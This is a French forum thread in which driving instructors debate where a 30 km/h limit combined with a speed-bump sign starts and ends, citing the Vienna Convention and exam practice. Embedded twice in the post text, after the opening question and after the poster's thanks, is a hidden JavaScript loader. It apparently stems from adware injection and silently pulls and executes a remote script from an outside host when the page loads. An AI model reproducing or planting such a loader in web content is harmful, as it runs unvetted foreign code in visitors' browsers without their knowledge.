Galères de moniteur auto-école

Rejoignez le forum, c’est rapide et facile

Galères de moniteur auto-école
Galères de moniteur auto-école
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.
Aller en bas
avatar
djam'z
Nouveau
Nouveau
Messages : 8
Date d'inscription : 20/10/2013
Age : 36
Localisation : 95

divergence avec une collegue Empty divergence avec une collegue

Mer 19 Mar - 19:12
Bonsoir les monos,

j aurais besoin de vos avis au sujet de ces panneaux  divergence avec une collegue 400_F_39094980_yU9vkHgcUGjvV61GG7fZmuYtSOoIkFnZralentisseur

j ai tjs dit à mes eleves de lire ces panneaux separément et que donc la vitesse ne s applique pas à partir du ralentisseur uniquement mais dès le panneau de limitation et jusqu'à la prochaine intersection.

le hic c'est que ce matin une eleve est venu me trouver, en me disant que ma collègue lui avait tenu le discours inverse, je vous avoue que je me suis senti con.

Donc j'en ai discuté avec ma collègue mais rien à faire elle est persuadé que l'interdiction s'applique sur le ralentisseur.

des avis sur la question svp? merci  Laughing 
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
avatar
lananad
Contributeur
Contributeur
Messages : 39
Date d'inscription : 02/03/2014

divergence avec une collegue Empty Re: divergence avec une collegue

Mer 19 Mar - 20:25
Bonjour
La limitation de vitesse s'applique dès le panneau et jusqu'à...u ralentisseur! Pas jusqua la prochaine intersection car les deux panneau sont apposes sur le meme poteau Very Happy 
Ta collègue a tort a 100% Laughing  et toi raison a 50 Embarassed
avatar
lescargotmasque
Membre gold
Membre gold
Messages : 1160
Date d'inscription : 01/11/2012
Localisation : Bourgogne

divergence avec une collegue Empty Re: divergence avec une collegue

Mer 19 Mar - 21:39
pour la fin de la limitation de vitesse c'est tendancieux tout dépend si on se réfère à la convention de vienne ou au code de la route français.

Dans les faits tout dépend de l'aménagement mis en place par la DDT (en gros si tu as un panneau de fin de limitation qui peu être beaucoup plus loin par exple )
avatar
Invité
Invité

divergence avec une collegue Empty Re: divergence avec une collegue

Jeu 20 Mar - 0:28
Ce que dit la convention de vienne:  Il n'y a pas non plus lieu de mettre en place une signalisation de fin de prescription : − quand il s'agit d'une indication ponctuelle évidente (par exemple défense de tourner à gauche, obligation d'aller tout droit, etc.)


L'interprétation qu'en fait le ministère de l'écologie: http://www.senat.fr/questions/base/2010/qSEQ100513522.html
Donc là les "dos d'âne" sont ajoutés à la liste.

Dans tous les cas, pas d'hésitation possible sur le début de la limitation de vitesse (au panneau) quant à sa fin, je suis bête et méchant et me suis adapté à ce qu'on demande à l'examen dans les 2 départements où j'ai bossé donc fin en descendant le ralentisseur.


Edit: sujet abordé ici: http://galeredemoniteur.forumpro.fr/t2383p20-fin-de-limitation-a-30-panneaux-ou-prochaine-intersection
avatar
Invité
Invité

divergence avec une collegue Empty Re: divergence avec une collegue

Jeu 20 Mar - 14:31
moi je leur dit ainsi que tous mes collègues que la limitation commence au poteau et finis après le ralentisseur
avatar
djam'z
Nouveau
Nouveau
Messages : 8
Date d'inscription : 20/10/2013
Age : 36
Localisation : 95

divergence avec une collegue Empty Re: divergence avec une collegue

Jeu 20 Mar - 20:29
merci à tous pour vos precisions!!  bounce 

j en ferais part à ma collègue

bonne soiree
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
loeb50
loeb50
Membre gold
Membre gold
Messages : 1357
Date d'inscription : 01/03/2012
Age : 55
Localisation : normandie

divergence avec une collegue Empty Re: divergence avec une collegue

Lun 18 Aoû - 18:54
perso telle que la photo , limite au panneau (pas de panonceau dessous) ralentisseur a 50 m , fin de limite a la prochaine intersection (pas de panonceau d"étendue dessous), lorsque panneau de danger ralentisseur plus panneau de limite de vitesse avec panonceau détendue 50m  dessous limte de vitesse au panneau et prend fin apres le ralentisseur voilà;
Poulet trop cuit
Poulet trop cuit
Membre premium
Membre premium
Messages : 185
Date d'inscription : 09/06/2014

divergence avec une collegue Empty Re: divergence avec une collegue

Lun 18 Aoû - 19:13
Chez moi j'ai 3 cas possible et c'est pas beau à voir :

Un village avec 4 fois ces panneaux et des ralentisseurs entre chaque, avec aussi entre chaque panneau des fins de limitations à 30.

Une ville avec juste les panneaux combinés + ralentisseurs

Un village avec le combiné de panneaux, un ralentisseur, et un 30 RAPPEL 50 mètres après (WTF ?)
Revenir en haut
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum